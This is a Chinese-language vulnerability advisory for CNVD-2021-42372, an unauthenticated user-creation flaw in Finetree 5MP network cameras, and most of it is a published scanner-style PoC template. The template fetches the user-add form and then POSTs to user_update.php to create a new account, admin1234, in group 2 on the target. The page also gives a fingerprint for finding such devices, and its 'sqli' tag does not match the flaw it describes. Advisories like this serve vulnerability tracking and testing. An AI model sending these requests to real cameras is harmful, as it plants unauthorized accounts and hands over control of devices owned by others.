CNVD-2021-42372: Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞

日期: 2025-08-01 | 影响软件: Finetree 5MP摄像机 | POC: 已公开

漏洞描述

Finetree 5MP 摄像机 user_pop.php文件存在未授权任意用户添加,攻击者添加后可以获取后台权限 p="Finetree-5MP-Network-Camera"

PoC代码[已公开]

id: CNVD-2021-42372

info:
  name: Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞
  author: zan8in
  severity: high
  description: |-
    Finetree 5MP 摄像机 user_pop.php文件存在未授权任意用户添加,攻击者添加后可以获取后台权限
    p="Finetree-5MP-Network-Camera"
  reference:
    - https://www.cnvd.org.cn/patchInfo/show/270651
  tags: cnvd,cnvd2021,sqli
  created: 2021/10/23

rules:
  r0:
    request:
      method: GET
      path: /quicksetup/user_pop.php?method=add
    expression: response.status == 200 && response.body.bcontains(b'name="user_name_field"') && response.body.bcontains(b'name="password_field"') && response.body.bcontains(b'name="confirm_password_field"')
  r1:
    request:
      method: POST
      path: /quicksetup/user_update.php
      body: "method=add&user=admin1234&pwd=admin1234&group=2&ptz_enable=0"
    expression: response.status == 200 && response.headers["server"].contains("WintenDo") && (response.body.bcontains(b'200') || response.body.bcontains(b'804'))
expression: r0() && r1()